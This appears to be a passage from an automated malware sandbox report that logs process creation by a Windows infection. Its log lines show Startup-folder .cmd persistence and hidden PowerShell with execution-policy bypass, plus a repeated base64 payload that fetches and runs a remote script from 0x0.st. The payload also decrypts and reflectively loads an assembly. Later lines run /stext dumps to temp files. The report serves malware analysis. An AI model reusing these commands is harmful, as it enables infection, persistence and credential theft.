DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_1baed2c6.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_1baed2c6.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_aa280a72.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_aa280a72.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\puDUCOeVK6.bat" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ilwtojl"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ilwtojl"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\sfcepcvxio"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\vhpwquorvxkde"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_77a2dde7.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e0484b8.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7J